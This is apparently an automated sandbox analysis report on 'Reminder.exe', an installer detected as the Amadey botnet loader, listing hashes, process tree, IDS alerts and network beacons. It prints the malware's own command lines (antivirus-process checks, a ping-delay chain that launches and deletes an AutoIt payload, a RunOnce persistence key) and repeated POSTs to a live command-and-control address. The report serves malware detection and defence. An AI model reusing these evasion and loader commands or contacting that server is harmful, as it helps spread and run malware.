Windows Analysis Report
Reminder.exe

Overview

General Information

Sample name:Reminder.exe
Analysis ID:1540342
MD5:d743bb6502147d38addb430590bc7a98
SHA1:16cd70dd31fc54c0e42695441dbf3eab5de2e2bd
SHA256:ebe565a1a2b13e3cbcf7bcc58ea8bee81bd1ed2fed0e5977dc9e108ee8cbae95

Detection

Amadey
Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Amadeys stealer DLL
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Sigma detected: Rare Remote Thread Creation By Uncommon Source Image
Sigma detected: Silenttrinity Stager Msbuild Activity
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Drops PE files
Enables debug privileges
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the product ID of Windows
Queries the volume information (name, serial number etc) of a device
Sigma detected: CurrentVersion Autorun Keys Modification
Uses 32bit PE files

Classification

  • System is w10x64_ra
  • Reminder.exe (PID: 6676 cmdline: "C:\Users\user\Desktop\Reminder.exe" MD5: D743BB6502147D38ADDB430590BC7A98)
    • Reminder.tmp (PID: 6664 cmdline: "C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp" /SL5="$40392,1755695,835584,C:\Users\user\Desktop\Reminder.exe" MD5: 4BFB5A37DC6ACBC273CEB792408BFEC9)
      • Reminder.exe (PID: 7084 cmdline: "C:\Users\user\Desktop\Reminder.exe" /VERYSILENT MD5: D743BB6502147D38ADDB430590BC7A98)
        • Reminder.tmp (PID: 4176 cmdline: "C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp" /SL5="$6037A,1755695,835584,C:\Users\user\Desktop\Reminder.exe" /VERYSILENT MD5: 4BFB5A37DC6ACBC273CEB792408BFEC9)
          • cmd.exe (PID: 6364 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH | find /I "wrsa.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 6368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • tasklist.exe (PID: 6468 cmdline: tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
            • find.exe (PID: 6488 cmdline: find /I "wrsa.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
          • cmd.exe (PID: 6592 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH | find /I "opssvc.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 6328 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • tasklist.exe (PID: 2828 cmdline: tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
            • find.exe (PID: 1732 cmdline: find /I "opssvc.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
          • cmd.exe (PID: 5000 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH | find /I "avastui.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 2864 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • tasklist.exe (PID: 6884 cmdline: tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
            • find.exe (PID: 3868 cmdline: find /I "avastui.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
          • cmd.exe (PID: 984 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH | find /I "avgui.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 1608 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • tasklist.exe (PID: 6760 cmdline: tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
            • find.exe (PID: 6844 cmdline: find /I "avgui.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
          • cmd.exe (PID: 6204 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH | find /I "nswscsvc.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • tasklist.exe (PID: 5612 cmdline: tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
            • find.exe (PID: 3532 cmdline: find /I "nswscsvc.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
          • cmd.exe (PID: 6448 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH | find /I "sophoshealth.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 1428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • tasklist.exe (PID: 6464 cmdline: tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
            • find.exe (PID: 2728 cmdline: find /I "sophoshealth.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
          • Updater.exe (PID: 6332 cmdline: "C:\Users\user\AppData\Local\coigned\\Updater.exe" "C:\Users\user\AppData\Local\coigned\\friendliwise.csv" MD5: 3F58A517F1F4796225137E7659AD2ADB)
            • cmd.exe (PID: 5700 cmdline: "C:\Windows\System32\cmd.exe" /c ping -n 5 127.0.0.1 >nul && updater.exe C:\ProgramData\\ZPrVgH71.a3x && del C:\ProgramData\\ZPrVgH71.a3x MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
              • conhost.exe (PID: 2900 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • PING.EXE (PID: 5564 cmdline: ping -n 5 127.0.0.1 MD5: B3624DD758CCECF93A1226CEF252CA12)
              • Updater.exe (PID: 6728 cmdline: updater.exe C:\ProgramData\\ZPrVgH71.a3x MD5: 3F58A517F1F4796225137E7659AD2ADB)
                • MSBuild.exe (PID: 7096 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
  • cleanup
Name: Amadey
Description: Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.
Attribution: No Attribution
Blogpost URLs:
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
Source | Rule | Description | Author | Strings
00000029.00000002.2093368871.0000000003E62000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security |
0000002A.00000002.2510265571.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security |

      System Summary

      Source: Threat created | Author: Perez Diego (@darkquassar), oscd.community | Data: EventID: 8, SourceImage: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, SourceProcessId: 7096, StartAddress: 420980, TargetImage: C:\Windows\System32\conhost.exe, TargetProcessId: 7096
      Source: Network Connection | Author: Kiran kumar s, oscd.community | Data: DestinationIp: 152.89.198.124, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Initiated: true, ProcessId: 7096, Protocol: tcp, SourceIp: 192.168.2.16, SourceIsIpv6: false, SourcePort: 49716
      Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: "C:\begcffd\AutoIt3.exe" C:\begcffd\fdeahdg.a3x, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\coigned\Updater.exe, ProcessId: 6728, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\fdeahdg
      Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
      2024-10-23T17:05:17.893815+0200 | 2856147 | 1 | A Network Trojan was detected | 192.168.2.16 | 49724 | 152.89.198.124 | 80 | TCP

      Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
      2024-10-23T17:04:59.570187+0200 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.16 | 49717 | 152.89.198.124 | 80 | TCP
      2024-10-23T17:05:04.499268+0200 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.16 | 49719 | 152.89.198.124 | 80 | TCP
      2024-10-23T17:05:09.470466+0200 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.16 | 49721 | 152.89.198.124 | 80 | TCP
      2024-10-23T17:05:14.387108+0200 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.16 | 49723 | 152.89.198.124 | 80 | TCP
      2024-10-23T17:05:20.333260+0200 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.16 | 49725 | 152.89.198.124 | 80 | TCP
      2024-10-23T17:05:25.275673+0200 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.16 | 49727 | 152.89.198.124 | 80 | TCP
      2024-10-23T17:05:30.591193+0200 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.16 | 49729 | 152.89.198.124 | 80 | TCP
      2024-10-23T17:05:35.558630+0200 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.16 | 49731 | 152.89.198.124 | 80 | TCP

      AV Detection

      Source: Reminder.exeReversingLabs: Detection: 54%
      Source: Reminder.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: Reminder.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

      Networking

      Source: Network trafficSuricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.16:49724 -> 152.89.198.124:80
      Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.16:49719 -> 152.89.198.124:80
      Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.16:49725 -> 152.89.198.124:80
      Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.16:49729 -> 152.89.198.124:80
      Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.16:49721 -> 152.89.198.124:80
      Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.16:49723 -> 152.89.198.124:80
      Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.16:49717 -> 152.89.198.124:80
      Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.16:49727 -> 152.89.198.124:80
      Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.16:49731 -> 152.89.198.124:80
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1
      Source: global trafficHTTP traffic detected: POST /8bdDsv3dk2FF/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 152.89.198.124Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
      Source: global trafficHTTP traffic detected: POST /8bdDsv3dk2FF/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 152.89.198.124Content-Length: 152Cache-Control: no-cacheData Raw: 72 3d 34 34 44 35 39 46 35 38 41 31 37 44 46 32 37 30 39 41 32 30 43 37 37 33 37 44 42 36 39 45 35 32 34 30 42 45 37 35 44 36 35 45 32 39 43 34 30 33 34 34 31 41 31 44 37 45 38 41 44 42 46 34 39 32 31 38 31 35 44 31 44 35 32 32 38 33 44 38 32 39 43 43 43 37 31 37 41 39 44 30 31 33 38 36 43 34 45 42 32 38 38 32 41 43 31 43 35 46 45 37 45 36 46 38 36 30 33 35 32 30 43 30 41 42 42 31 43 38 35 43 39 45 34 41 32 45 31 36 33 38 41 36 45 42 32 45 43 44 33 34 Data Ascii: r=44D59F58A17DF2709A20C7737DB69E5240BE75D65E29C403441A1D7E8ADBF4921815D1D52283D829CCC717A9D01386C4EB2882AC1C5FE7E6F8603520C0ABB1C85C9E4A2E1638A6EB2ECD34
      Source: global trafficHTTP traffic detected: POST /8bdDsv3dk2FF/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 152.89.198.124Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
      Source: global trafficHTTP traffic detected: POST /8bdDsv3dk2FF/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 152.89.198.124Content-Length: 152Cache-Control: no-cacheData Raw: 72 3d 34 34 44 35 39 46 35 38 41 31 37 44 46 32 37 30 39 41 32 30 43 37 37 33 37 44 42 36 39 45 35 32 34 30 42 45 37 35 44 36 35 45 32 39 43 34 30 33 34 34 31 41 31 44 37 45 38 41 44 42 46 34 39 32 31 38 31 35 44 31 44 35 32 32 38 33 44 38 32 39 43 43 43 37 31 37 41 39 44 30 31 33 38 36 43 34 45 42 32 38 38 32 41 43 31 43 35 46 45 37 45 36 46 38 36 30 33 35 32 30 43 30 41 42 42 31 43 38 35 43 39 45 34 41 32 45 31 36 33 38 41 36 45 42 32 45 43 44 33 34 Data Ascii: r=44D59F58A17DF2709A20C7737DB69E5240BE75D65E29C403441A1D7E8ADBF4921815D1D52283D829CCC717A9D01386C4EB2882AC1C5FE7E6F8603520C0ABB1C85C9E4A2E1638A6EB2ECD34
      Source: global trafficHTTP traffic detected: POST /8bdDsv3dk2FF/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 152.89.198.124Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
      Source: global trafficHTTP traffic detected: POST /8bdDsv3dk2FF/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 152.89.198.124Content-Length: 152Cache-Control: no-cacheData Raw: 72 3d 34 34 44 35 39 46 35 38 41 31 37 44 46 32 37 30 39 41 32 30 43 37 37 33 37 44 42 36 39 45 35 32 34 30 42 45 37 35 44 36 35 45 32 39 43 34 30 33 34 34 31 41 31 44 37 45 38 41 44 42 46 34 39 32 31 38 31 35 44 31 44 35 32 32 38 33 44 38 32 39 43 43 43 37 31 37 41 39 44 30 31 33 38 36 43 34 45 42 32 38 38 32 41 43 31 43 35 46 45 37 45 36 46 38 36 30 33 35 32 30 43 30 41 42 42 31 43 38 35 43 39 45 34 41 32 45 31 36 33 38 41 36 45 42 32 45 43 44 33 34 Data Ascii: r=44D59F58A17DF2709A20C7737DB69E5240BE75D65E29C403441A1D7E8ADBF4921815D1D52283D829CCC717A9D01386C4EB2882AC1C5FE7E6F8603520C0ABB1C85C9E4A2E1638A6EB2ECD34
      Source: global trafficHTTP traffic detected: POST /8bdDsv3dk2FF/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 152.89.198.124Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
      Source: global trafficHTTP traffic detected: POST /8bdDsv3dk2FF/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 152.89.198.124Content-Length: 152Cache-Control: no-cacheData Raw: 72 3d 34 34 44 35 39 46 35 38 41 31 37 44 46 32 37 30 39 41 32 30 43 37 37 33 37 44 42 36 39 45 35 32 34 30 42 45 37 35 44 36 35 45 32 39 43 34 30 33 34 34 31 41 31 44 37 45 38 41 44 42 46 34 39 32 31 38 31 35 44 31 44 35 32 32 38 33 44 38 32 39 43 43 43 37 31 37 41 39 44 30 31 33 38 36 43 34 45 42 32 38 38 32 41 43 31 43 35 46 45 37 45 36 46 38 36 30 33 35 32 30 43 30 41 42 42 31 43 38 35 43 39 45 34 41 32 45 31 36 33 38 41 36 45 42 32 45 43 44 33 34 Data Ascii: r=44D59F58A17DF2709A20C7737DB69E5240BE75D65E29C403441A1D7E8ADBF4921815D1D52283D829CCC717A9D01386C4EB2882AC1C5FE7E6F8603520C0ABB1C85C9E4A2E1638A6EB2ECD34
      Source: global trafficHTTP traffic detected: POST /8bdDsv3dk2FF/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 152.89.198.124Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
      Source: global trafficHTTP traffic detected: POST /8bdDsv3dk2FF/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 152.89.198.124Content-Length: 152Cache-Control: no-cacheData Raw: 72 3d 34 34 44 35 39 46 35 38 41 31 37 44 46 32 37 30 39 41 32 30 43 37 37 33 37 44 42 36 39 45 35 32 34 30 42 45 37 35 44 36 35 45 32 39 43 34 30 33 34 34 31 41 31 44 37 45 38 41 44 42 46 34 39 32 31 38 31 35 44 31 44 35 32 32 38 33 44 38 32 39 43 43 43 37 31 37 41 39 44 30 31 33 38 36 43 34 45 42 32 38 38 32 41 43 31 43 35 46 45 37 45 36 46 38 36 30 33 35 32 30 43 30 41 42 42 31 43 38 35 43 39 45 34 41 32 45 31 36 33 38 41 36 45 42 32 45 43 44 33 34 Data Ascii: r=44D59F58A17DF2709A20C7737DB69E5240BE75D65E29C403441A1D7E8ADBF4921815D1D52283D829CCC717A9D01386C4EB2882AC1C5FE7E6F8603520C0ABB1C85C9E4A2E1638A6EB2ECD34
      Source: global trafficHTTP traffic detected: POST /8bdDsv3dk2FF/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 152.89.198.124Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
      Source: global trafficHTTP traffic detected: POST /8bdDsv3dk2FF/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 152.89.198.124Content-Length: 152Cache-Control: no-cacheData Raw: 72 3d 34 34 44 35 39 46 35 38 41 31 37 44 46 32 37 30 39 41 32 30 43 37 37 33 37 44 42 36 39 45 35 32 34 30 42 45 37 35 44 36 35 45 32 39 43 34 30 33 34 34 31 41 31 44 37 45 38 41 44 42 46 34 39 32 31 38 31 35 44 31 44 35 32 32 38 33 44 38 32 39 43 43 43 37 31 37 41 39 44 30 31 33 38 36 43 34 45 42 32 38 38 32 41 43 31 43 35 46 45 37 45 36 46 38 36 30 33 35 32 30 43 30 41 42 42 31 43 38 35 43 39 45 34 41 32 45 31 36 33 38 41 36 45 42 32 45 43 44 33 34 Data Ascii: r=44D59F58A17DF2709A20C7737DB69E5240BE75D65E29C403441A1D7E8ADBF4921815D1D52283D829CCC717A9D01386C4EB2882AC1C5FE7E6F8603520C0ABB1C85C9E4A2E1638A6EB2ECD34
      Source: global trafficHTTP traffic detected: POST /8bdDsv3dk2FF/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 152.89.198.124Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
      Source: global trafficHTTP traffic detected: POST /8bdDsv3dk2FF/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 152.89.198.124Content-Length: 152Cache-Control: no-cacheData Raw: 72 3d 34 34 44 35 39 46 35 38 41 31 37 44 46 32 37 30 39 41 32 30 43 37 37 33 37 44 42 36 39 45 35 32 34 30 42 45 37 35 44 36 35 45 32 39 43 34 30 33 34 34 31 41 31 44 37 45 38 41 44 42 46 34 39 32 31 38 31 35 44 31 44 35 32 32 38 33 44 38 32 39 43 43 43 37 31 37 41 39 44 30 31 33 38 36 43 34 45 42 32 38 38 32 41 43 31 43 35 46 45 37 45 36 46 38 36 30 33 35 32 30 43 30 41 42 42 31 43 38 35 43 39 45 34 41 32 45 31 36 33 38 41 36 45 42 32 45 43 44 33 34 Data Ascii: r=44D59F58A17DF2709A20C7737DB69E5240BE75D65E29C403441A1D7E8ADBF4921815D1D52283D829CCC717A9D01386C4EB2882AC1C5FE7E6F8603520C0ABB1C85C9E4A2E1638A6EB2ECD34
      Source: global trafficHTTP traffic detected: POST /8bdDsv3dk2FF/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 152.89.198.124Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
      Source: global trafficHTTP traffic detected: POST /8bdDsv3dk2FF/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 152.89.198.124Content-Length: 152Cache-Control: no-cacheData Raw: 72 3d 34 34 44 35 39 46 35 38 41 31 37 44 46 32 37 30 39 41 32 30 43 37 37 33 37 44 42 36 39 45 35 32 34 30 42 45 37 35 44 36 35 45 32 39 43 34 30 33 34 34 31 41 31 44 37 45 38 41 44 42 46 34 39 32 31 38 31 35 44 31 44 35 32 32 38 33 44 38 32 39 43 43 43 37 31 37 41 39 44 30 31 33 38 36 43 34 45 42 32 38 38 32 41 43 31 43 35 46 45 37 45 36 46 38 36 30 33 35 32 30 43 30 41 42 42 31 43 38 35 43 39 45 34 41 32 45 31 36 33 38 41 36 45 42 32 45 43 44 33 34 Data Ascii: r=44D59F58A17DF2709A20C7737DB69E5240BE75D65E29C403441A1D7E8ADBF4921815D1D52283D829CCC717A9D01386C4EB2882AC1C5FE7E6F8603520C0ABB1C85C9E4A2E1638A6EB2ECD34
      Source: unknownTCP traffic detected without corresponding DNS query: 152.89.198.124
      Source: unknownTCP traffic detected without corresponding DNS query: 152.89.198.124
      Source: unknownTCP traffic detected without corresponding DNS query: 152.89.198.124
      Source: unknownTCP traffic detected without corresponding DNS query: 152.89.198.124
      Source: unknownTCP traffic detected without corresponding DNS query: 152.89.198.124
      Source: unknownTCP traffic detected without corresponding DNS query: 152.89.198.124
      Source: unknownTCP traffic detected without corresponding DNS query: 152.89.198.124
      Source: unknownTCP traffic detected without corresponding DNS query: 152.89.198.124
      Source: unknownTCP traffic detected without corresponding DNS query: 152.89.198.124
      Source: unknownTCP traffic detected without corresponding DNS query: 152.89.198.124
      Source: unknownTCP traffic detected without corresponding DNS query: 152.89.198.124
      Source: unknownTCP traffic detected without corresponding DNS query: 152.89.198.124
      Source: unknownTCP traffic detected without corresponding DNS query: 152.89.198.124
      Source: unknownTCP traffic detected without corresponding DNS query: 152.89.198.124
      Source: unknownTCP traffic detected without corresponding DNS query: 152.89.198.124
      Source: unknownTCP traffic detected without corresponding DNS query: 152.89.198.124
      Source: unknownTCP traffic detected without corresponding DNS query: 152.89.198.124
      Source: unknownTCP traffic detected without corresponding DNS query: 152.89.198.124
      Source: unknownTCP traffic detected without corresponding DNS query: 152.89.198.124
      Source: unknownTCP traffic detected without corresponding DNS query: 152.89.198.124
      Source: unknownTCP traffic detected without corresponding DNS query: 152.89.198.124
      Source: unknownTCP traffic detected without corresponding DNS query: 152.89.198.124
      Source: unknownTCP traffic detected without corresponding DNS query: 152.89.198.124
      Source: unknownTCP traffic detected without corresponding DNS query: 152.89.198.124
      Source: unknownTCP traffic detected without corresponding DNS query: 152.89.198.124
      Source: unknownTCP traffic detected without corresponding DNS query: 152.89.198.124
      Source: unknownTCP traffic detected without corresponding DNS query: 152.89.198.124
      Source: unknownTCP traffic detected without corresponding DNS query: 152.89.198.124
      Source: unknownTCP traffic detected without corresponding DNS query: 192.229.221.95
      Source: unknownTCP traffic detected without corresponding DNS query: 192.229.221.95
      Source: unknownTCP traffic detected without corresponding DNS query: 152.89.198.124
      Source: unknownTCP traffic detected without corresponding DNS query: 152.89.198.124
      Source: unknownTCP traffic detected without corresponding DNS query: 152.89.198.124
      Source: unknownTCP traffic detected without corresponding DNS query: 152.89.198.124
      Source: unknownTCP traffic detected without corresponding DNS query: 152.89.198.124
      Source: unknownTCP traffic detected without corresponding DNS query: 152.89.198.124
      Source: unknownTCP traffic detected without corresponding DNS query: 152.89.198.124
      Source: unknownTCP traffic detected without corresponding DNS query: 152.89.198.124
      Source: unknownTCP traffic detected without corresponding DNS query: 152.89.198.124
      Source: unknownTCP traffic detected without corresponding DNS query: 152.89.198.124
      Source: unknownTCP traffic detected without corresponding DNS query: 152.89.198.124
      Source: unknownTCP traffic detected without corresponding DNS query: 152.89.198.124
      Source: unknownTCP traffic detected without corresponding DNS query: 152.89.198.124
      Source: unknownTCP traffic detected without corresponding DNS query: 152.89.198.124
      Source: unknownTCP traffic detected without corresponding DNS query: 152.89.198.124
      Source: unknownTCP traffic detected without corresponding DNS query: 152.89.198.124
      Source: unknownTCP traffic detected without corresponding DNS query: 152.89.198.124
      Source: unknownTCP traffic detected without corresponding DNS query: 152.89.198.124
      Source: unknownTCP traffic detected without corresponding DNS query: 152.89.198.124
      Source: unknownTCP traffic detected without corresponding DNS query: 152.89.198.124
      Source: unknownHTTP traffic detected: POST /8bdDsv3dk2FF/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 152.89.198.124Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
      Source: Reminder.exeStatic PE information: Number of sections : 11 > 10
      Source: Reminder.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: classification engineClassification label: mal84.troj.spyw.evad.winEXE@60/7@0/11
      Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmpFile created: C:\Users\user\AppData\Local\coigned
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2900:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1428:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6368:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1608:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: Local\SM0:2864:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6328:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7096:120:WilError_03
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMutant created: \Sessions\1\BaseNamedObjects\cb36de7f397799e419deb9caf3a96a89
      Source: C:\Users\user\Desktop\Reminder.exeFile created: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp
      Source: C:\Users\user\Desktop\Reminder.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
      Source: C:\Users\user\Desktop\Reminder.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
      Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
      Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
      Source: C:\Users\user\Desktop\Reminder.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
      Source: C:\Users\user\Desktop\Reminder.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
      Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
      Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
      Source: C:\Users\user\AppData\Local\coigned\Updater.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'AVGUI.EXE'
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'NSWSCSVC.EXE'
